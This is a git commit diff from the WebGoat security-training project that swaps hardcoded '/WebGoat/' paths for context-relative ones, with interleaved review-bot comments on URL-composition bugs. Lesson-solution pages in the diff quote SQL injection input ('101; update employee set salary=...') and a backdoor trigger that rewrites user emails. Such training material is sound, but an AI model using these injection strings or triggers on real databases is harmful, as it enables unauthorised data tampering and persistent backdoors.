Removed hardcoded webgoat path for URLs

git-svn-id: http://webgoat.googlecode.com/svn/trunk@367 4033779f-a91e-0410-96ef-6bf7bf53c507
mayhew64 2008-11-21 16:57:23 +00:00
parent bab1f6aeb7
commit 9d8c58bef3
68 changed files with 592 additions and 592 deletions


@ -386,11 +386,11 @@ public class Challenge2Screen extends SequentialLessonAdapter
// show webgoat.jsp text
ec.addElement(new H1().addElement("Original Website Text"));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc("/WebGoat/" + WEBGOAT_CHALLENGE_JSP));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE_JSP));
ec.addElement(new HR());
ec.addElement(new H1().addElement("Defaced Website Text"));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(
"/WebGoat/" + WEBGOAT_CHALLENGE + "_"
s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE + "_"
+ s.getUserName() + JSP));
ec.addElement(new HR());
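Review bot: `s.getRequest().getContextPath() + "/"` is spelled out twice in this hunk, once for the "Original Website Text" iframe and once for the "Defaced Website Text" iframe, so the two src values can drift apart on a later edit; a local declared before the first `addElement`, `String base = s.getRequest().getContextPath() + "/";`, used in both places keeps them in step. The composition itself is right: getContextPath() is either the empty string (root deployment) or a path beginning with "/" and no trailing slash, so `base + WEBGOAT_CHALLENGE_JSP` is an absolute path in both cases. The enclosing method starts and ends outside the hunk.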


@ -136,7 +136,7 @@ public class WSDLScanning extends LessonAdapter
return "WSDL Scanning";
}
public Object accessWGService(String serv, int port, String proc, String parameterName, Object parameterValue)
public Object accessWGService(WebSession s, String serv, int port, String proc, String parameterName, Object parameterValue)
{
String targetNamespace = "WebGoat";
try
@ -150,7 +150,7 @@ public class WSDLScanning extends LessonAdapter
call.setReturnType(XMLType.XSD_STRING);
call.setUsername("guest");
call.setPassword("guest");
call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/" + serv);
call.setTargetEndpointAddress("http://localhost:" + port + "/" + s.getRequest().getContextPath() + "/services/" + serv);
Object result = call.invoke(new Object[] { parameterValue });
return result;
} catch (RemoteException e)
@ -214,7 +214,7 @@ public class WSDLScanning extends LessonAdapter
for (int i = 0; i < fields.length; i++)
{
header.addElement(new TD().addElement(fields[i]));
results.addElement(new TD().addElement((String) accessWGService("WSDLScanning", port, fields[i],
results.addElement(new TD().addElement((String) accessWGService(s, "WSDLScanning", port, fields[i],
"acct_num", new Integer(id))));
}
if (fields.length == 0)
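Review bot: The endpoint URL on the new line of the second hunk, `"http://localhost:" + port + "/" + s.getRequest().getContextPath() + "/services/" + serv`, inserts a literal slash before the context path, but getContextPath() already begins with "/" (and is empty for a root deployment), so the endpoint becomes `http://localhost:PORT//WebGoat/services/...`; drop the literal: `call.setTargetEndpointAddress("http://localhost:" + port + s.getRequest().getContextPath() + "/services/" + serv);`. Whether the container normalizes the doubled slash before routing to the Axis servlet is container-specific, so this is likely to surface only on some deployments. The Challenge2Screen change in this same commit composes the path as `getContextPath() + "/" + ...`, which is the form to follow here. accessWGService's body continues outside the hunk.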


@ -123,8 +123,8 @@ public class Interceptor implements Filter
String url = req.getRequestURL().toString();
RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf("WebGoat/")
+ "WebGoat".length()));
RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf(req.getContextPath() + "/")
+ req.getContextPath().length()));
disp.forward(request, response);
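Review bot: The new substring computation misbehaves for a root deployment: getContextPath() returns "" there, so `url.lastIndexOf("" + "/")` finds the last slash of the entire request URL and the dispatcher receives only the final path segment instead of the context-relative path. A -1 from lastIndexOf (request URL without the context path) is also unhandled and yields a wrong or out-of-range start index, as in the old code. The servlet API already exposes the context-relative path without searching the URL string: `RequestDispatcher disp = req.getRequestDispatcher(req.getRequestURI().substring(req.getContextPath().length()));`, which also removes the dependence on the last occurrence of the context path within the URL. The enclosing method starts and ends outside the hunk.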


@ -15,7 +15,7 @@ in the Introduction section.</p>
<h2>The WebGoat Interface</h2>
<p>
<img src="/WebGoat/images/introduction/interface.jpg"><br><br>
<img src="images/introduction/interface.jpg"><br><br>
1. These are Lesson Categories in WebGoat. Click on a Category to see all Lessons in it.<br>
2. This will show technical hints to solve the lesson.<br>
3. This will show the HTTP Request Parameters<br>
@ -34,16 +34,16 @@ solution for complete details.</p>
To read and edit Parameters you need a local proxy to intercept the HTTP request.
Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_1.jpg"><br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_2.jpg"><br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.
</p>
<h2>Read And Edit Cookies</h2>
<p>
Often it is not only necessary to change the value of the parameters but to change the value of cookies.
We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_3.jpg"><br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit the values of them.
</p>
<!-- Stop Instructions -->


@ -10,26 +10,26 @@ WebScarab is a proxy for analyzing applications that
communicate using the HTTP and HTTPS protocols. Because WebScarab
operates as an intercepting proxy, we can review and modify requests
and responses.<br><br>
<img src="/WebGoat/images/introduction/webscarab.jpg"><br><br>
<img src="images/introduction/webscarab.jpg"><br><br>
Webpage:<a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a>
</p>
<h2>Firebug:</h2>
<p>
Firebug is an add-on for the Firefox browser. We can use it to inspect, edit and monitor CSS, HTML and JavaScript.<br><br>
<img src="/WebGoat/images/introduction/firebug.jpg"><br><br>
<img src="images/introduction/firebug.jpg"><br><br>
Webpage:<a href="http://www.getfirebug.com" target="_blank">http://www.getfirebug.com</a>
<br><br>
<h2>IEWatch:</h2>
<p>
IEWatch is a tool to analyze HTTP and HTML for users of the Internet Explorer.<br><br>
<img src="/WebGoat/images/introduction/iewatch.jpg"><br><br>
<img src="images/introduction/iewatch.jpg"><br><br>
Webpage:<a href="http://www.iewatch.com" target="_blank">http://www.iewatch.com</a>
</p>
<h2>Wireshark</h2>
<p>
Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
informations this way.<br><br>
<img src="/WebGoat/images/introduction/wireshark.png"><br><br>
<img src="images/introduction/wireshark.png"><br><br>
Webpage:<a href="http://www.wireshark.org" target="_blank">http://www.wireshark.org</a>
</p>


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/AccessControlMatrix_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/AccessControlMatrix_files/editdata.mso">
<link rel=File-List href="lesson_solutions/AccessControlMatrix_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/AccessControlMatrix_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/AccessControlMatrix_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/AccessControlMatrix_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml">
href="lesson_solutions/AccessControlMatrix_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -656,9 +656,9 @@ you will learn that Larry can access resources of the role Account Manager.<o:p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_463" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/AccessControlMatrix_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image002.jpg" v:shapes="Picture_x0020_463"><![endif]></span></p>
src="lesson_solutions/AccessControlMatrix_files/image002.jpg" v:shapes="Picture_x0020_463"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -672,9 +672,9 @@ field-end'></span><![endif]--> Lesson 9<span style='font-family:"Arial","sans-se
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_464"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/AccessControlMatrix_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image004.jpg" v:shapes="Picture_x0020_464"><![endif]></span></p>
src="lesson_solutions/AccessControlMatrix_files/image004.jpg" v:shapes="Picture_x0020_464"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BackDoors_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BackDoors_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BackDoors_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BackDoors_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BackDoors_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/BackDoors_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/BackDoors_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/BackDoors_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -698,9 +698,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_147" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image013.jpg" v:shapes="Picture_x0020_147"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image013.jpg" v:shapes="Picture_x0020_147"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -722,9 +722,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_148"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image014.jpg" v:shapes="Picture_x0020_148"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image014.jpg" v:shapes="Picture_x0020_148"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -758,9 +758,9 @@ for the user ID: 101; update employee set salary=10000<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_149"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image015.jpg" v:shapes="Picture_x0020_149"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image015.jpg" v:shapes="Picture_x0020_149"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -775,9 +775,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_150"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image016.jpg" v:shapes="Picture_x0020_150"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image016.jpg" v:shapes="Picture_x0020_150"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -798,9 +798,9 @@ email='john@hackme.com'WHERE userid = NEW.userid<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_151"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image017.jpg" v:shapes="Picture_x0020_151"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image017.jpg" v:shapes="Picture_x0020_151"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -814,9 +814,9 @@ field-end'></span><![endif]--> Insert trigger</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_152" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image018.jpg" v:shapes="Picture_x0020_152"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image018.jpg" v:shapes="Picture_x0020_152"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BasicAuthentication_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BasicAuthentication_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BasicAuthentication_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/BasicAuthentication_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/BasicAuthentication_files/colorschememapping.xml">
href="lesson_solutions/BasicAuthentication_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -637,9 +637,9 @@ questions below.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1015" o:spid="_x0000_i1036" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image025.jpg" v:shapes="Picture_x0020_1015"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image025.jpg" v:shapes="Picture_x0020_1015"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -659,9 +659,9 @@ request with WebScarab.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1016"
o:spid="_x0000_i1035" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image026.jpg" v:shapes="Picture_x0020_1016"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image026.jpg" v:shapes="Picture_x0020_1016"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -682,9 +682,9 @@ this by using WebScarab > Tools > Transcoder.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1017"
o:spid="_x0000_i1034" type="#_x0000_t75" style='width:365.25pt;height:243.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=487 height=325
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image027.jpg" v:shapes="Picture_x0020_1017"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image027.jpg" v:shapes="Picture_x0020_1017"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -704,9 +704,9 @@ decode. <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1018"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:449.25pt;height:300pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=599 height=400
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image028.jpg" v:shapes="Picture_x0020_1018"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image028.jpg" v:shapes="Picture_x0020_1018"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -725,9 +725,9 @@ be used to complete the questions.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1019"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image029.jpg" v:shapes="Picture_x0020_1019"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image029.jpg" v:shapes="Picture_x0020_1019"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -743,9 +743,9 @@ field-end'></span><![endif]--> Answers<span style='font-family:"Arial","sans-ser
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1020"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image030.jpg" v:shapes="Picture_x0020_1020"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image030.jpg" v:shapes="Picture_x0020_1020"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -764,9 +764,9 @@ authentication.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1021" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:435.75pt;height:343.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=581 height=458
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image031.jpg" v:shapes="Picture_x0020_1021"><![endif]></span><span
src="lesson_solutions/BasicAuthentication_files/image031.jpg" v:shapes="Picture_x0020_1021"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -811,9 +811,9 @@ cookie is sent in every request.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1022"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:244.5pt;height:265.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=326 height=354
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image032.jpg" v:shapes="Picture_x0020_1022"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image032.jpg" v:shapes="Picture_x0020_1022"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -833,9 +833,9 @@ can decode this value in WebScarab > Tools > Transcoder).<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1023"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image033.jpg" v:shapes="Picture_x0020_1023"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image033.jpg" v:shapes="Picture_x0020_1023"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -860,9 +860,9 @@ screenshot below.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1024"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:448.5pt;height:353.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image019.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image019.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=598 height=471
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image034.jpg" v:shapes="Picture_x0020_1024"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image034.jpg" v:shapes="Picture_x0020_1024"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -878,9 +878,9 @@ field-end'></span><![endif]--> Corrupt JSESSIONID<span style='font-family:"Arial
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1025"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image021.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image021.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image035.jpg" v:shapes="Picture_x0020_1025"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image035.jpg" v:shapes="Picture_x0020_1025"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -902,9 +902,9 @@ lesson "Basic Authentication" to complete this lesson.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1026"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image023.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image023.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image036.jpg" v:shapes="Picture_x0020_1026"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image036.jpg" v:shapes="Picture_x0020_1026"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BlindSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BlindSqlInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BlindSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BlindSqlInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BlindSqlInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/BlindSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
